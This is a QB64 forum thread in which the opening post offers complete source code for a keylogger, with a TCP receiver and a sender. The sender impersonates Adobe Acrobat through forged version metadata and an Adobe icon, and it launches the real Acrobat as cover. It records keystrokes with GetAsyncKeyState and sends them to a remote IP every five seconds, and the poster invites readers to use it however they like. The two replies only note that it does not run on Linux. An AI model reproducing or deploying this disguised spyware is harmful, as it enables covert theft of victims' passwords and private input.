« previous next »
Pages: [1]   Go Down

Author Topic: Keylogger over TCP/IP  (Read 5771 times)

0 Members and 1 Guest are viewing this topic.

Offline SpriggsySpriggs

  • Forum Resident
  • Posts: 1145
  • Larger than life
    • View Profile
    • GitHub
Keylogger over TCP/IP
« on: May 05, 2020, 03:31:16 pm »
Using some of the code out there for making a hidden mouse and key logger on the Wiki I decided to try to make a keylogger that would be truly sneaky. Behold, a keylogger that runs in the background and LOOKS like Adobe Acrobat, even launching the program (if it is installed)! It runs in the background sending the keystrokes to the recipient every 5 seconds to be put into a file on the recipient's hard drive. Do with this what you will. MWAAHHAHAHA!

Code for recipient's side:
Code: QB64: [Select]
  3. OPEN "logger.txt" FOR OUTPUT AS #F
  4. c = _OPENHOST("TCP/IP:300") 'or any other port that you decide to use for both sides
  6.     DO
  7.         client = _OPENCONNECTION(c)
  8.     LOOP UNTIL client
  9.     DO
  10.         GET #client, , b$
  11.         IF b$ <> "" THEN PRINT #F, b$
  12.         b$ = ""
  13.         _LIMIT 120
  14.     LOOP 'UNTIL INKEY$ = CHR$(27)

For the sender's side:
Code: QB64: [Select]
  2. _TITLE "Adobe Acrobat 2020"
  3. $VERSIONINFO:CompanyName=Adobe Inc.
  4. $VERSIONINFO:FileDescription=Adobe Acrobat 2020
  5. $VERSIONINFO:LegalCopyright=Copyright 1984-2020 Adobe Systems Inc
  6. $VERSIONINFO:Web=https://adobe.com
  7. $VERSIONINFO:Comments=Open and edit your PDFs naturally with Adobe Acrobat 2020!
  8. $VERSIONINFO:PRODUCTVERSION#=1,2,4,5
  9. $VERSIONINFO:FILEVERSION#=1,2,4,5
  10. $VERSIONINFO:ProductName=Adobe Acrobat 2020
  11. $EXEICON:'adobe icon.ico'
  12. '$INCLUDE:'adobe icon.ico.bin.bas'
  14.     FUNCTION GetAsyncKeyState% (BYVAL vkey AS LONG)
  16. '$DYNAMIC
  18.     SHELL _HIDE _DONTWAIT CHR$(34) + "C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe" + CHR$(34) + " " + CHR$(34) + COMMAND$ + CHR$(34)
  20.     SHELL _HIDE _DONTWAIT CHR$(34) + "C:\Program Files (x86)\Adobe\Acrobat DC\Acrobat\Acrobat.exe" + CHR$(34)
  22. DIM theitem$(1)
  23. c = _OPENCLIENT("TCP/IP:300:"+ recipientIP$)
  25.     LOGGER:
  26.     REDIM theitem$(1)
  27.     start = TIMER(0.01)
  28.     DO: _LIMIT 100
  29.         FOR thekey = &H30 TO &H5A
  30.             IF GetAsyncKeyState(thekey) THEN
  31.                 theitem$(a) = theitem$(a) + CHR$(thekey)
  32.                 DO
  33.                 LOOP UNTIL GetAsyncKeyState(thekey) = 0
  34.             END IF
  35.         NEXT
  36.         IF GetAsyncKeyState(&H20) THEN
  37.             theitem$(a) = theitem$(a) + " "
  38.             DO
  39.             LOOP UNTIL GetAsyncKeyState(&H20) = 0
  40.         END IF
  41.         IF GetAsyncKeyState(8) THEN
  42.             theitem$(a) = theitem$(a) + "{BS}"
  43.             DO
  44.             LOOP UNTIL GetAsyncKeyState(8) = 0
  45.         END IF
  46.         ender = TIMER(0.01)
  47.         IF ender >= start + 5 THEN
  48.             GOTO LOGWRITE
  49.         END IF
  50.     LOOP
  51.     LOGWRITE:
  52.     FOR b = 0 TO a
  53.         IF theitem$(b) <> "" THEN
  54.             PUT #c, , theitem$(b)
  55.         END IF
  56.     NEXT
  57.     GOTO LOGGER
Logged
Shuwatch!

Offline _vince

  • Seasoned Forum Regular
  • Posts: 422
    • View Profile
Re: Keylogger over TCP/IP
« Reply #1 on: May 05, 2020, 08:54:34 pm »
Looks neat and clever but it's not running on my linux computer ;-(

I hope someone with windows will try it!
Logged

Offline SpriggsySpriggs

  • Forum Resident
  • Posts: 1145
  • Larger than life
    • View Profile
    • GitHub
Re: Keylogger over TCP/IP
« Reply #2 on: May 05, 2020, 10:44:28 pm »
Quote from: _vince on May 05, 2020, 08:54:34 pm
Looks neat and clever but it's not running on my linux computer ;-(

I hope someone with windows will try it!
This is because the calls are Windows specific and some of the versioninfo is probably not available in Linux.
Logged
Shuwatch!
Pages: [1]   Go Up
« previous next »